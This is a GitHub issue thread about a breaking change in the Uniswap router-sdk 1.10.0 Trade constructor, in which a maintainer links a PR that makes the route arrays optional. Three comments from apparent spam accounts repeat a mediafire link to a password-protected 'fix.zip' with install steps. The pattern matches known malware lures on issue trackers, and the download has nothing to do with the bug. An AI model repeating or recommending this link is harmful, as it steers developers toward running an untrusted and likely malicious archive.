### ISSUE TITLE
router-sdk: Breaking changes introduced to Trade object constructor with version 1.10.0

### ISSUE THREAD

**Issue by beder-bourahmah-gluwa** [Uniswap/sdks#80]
Version 1.10.0 introduced the `v4Routes` array as a required property on the `Trade` object's constructor [here](https://github.com/Uniswap/sdks/commit/e57e8595ce3182b6b3c9decb3163a6dd70ea32d9#diff-71548c0260bb3f4ab2fcb537edd60ea2f31b7409af8c64f47f28f92ed7cdc2d8R45).

Previously, you could use the constructor as follows:
```
new Trade({ v2Routes: [], v3Routes: v3RoutesGoHere, mixedRoutes: [], tradeType: tradeTypeGoesHere })
```

However, this does not work with version 1.10.0 and can cause runtime errors. In our case, the package.json dependency was set as follows:
```
"@uniswap/router-sdk": "^1.9.2"
```

This allows for 1.10.0 to be used instead of 1.9.2 because it assumes compliance with semantic versioning, i.e. no breaking changes for a _minor_ revision. However, if it does use 1.10.0 and the constructor is used as shown above to work with 1.9.2, you will see the following error:
```
TypeError: undefined is not iterable (cannot read property Symbol(Symbol.iterator))
    at _createForOfIteratorHelperLoose4 (chunk-ANO3WF4I.js?v=e35eaaa1:7757:50)
    at new Trade5 (chunk-ANO3WF4I.js?v=e35eaaa1:8363:31)
```

Which points at [this line](https://github.com/Uniswap/sdks/commit/e57e8595ce3182b6b3c9decb3163a6dd70ea32d9#diff-71548c0260bb3f4ab2fcb537edd60ea2f31b7409af8c64f47f28f92ed7cdc2d8R80).

It is easy enough to fix this issue as a consumer of this library by updating package.json to lock on 1.10.0 and pass an empty array for the new property, but this is not ideal.

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ewilz** [comment]
Thanks @beder-bourahmah-gluwa. Thinking of patching this in this PR. Of course, if you've already fixed your code to match, you'll have to do it once again 😓 https://github.com/Uniswap/sdks/pull/82

**Comment by beder-bourahmah-gluwa** [comment]
Thank you for the quick turnaround @ewilz . Since your PR makes those route arrays optional on the constructor and we were explicitly setting them to empty arrays when not utilizing them in our code, we won't need to change our code after that change is released. Thank you!

**Comment by ewilz** [comment]
great, sure then you should be good,. yah for some of the other functions like `fromRoute` it's a little more opinionated.
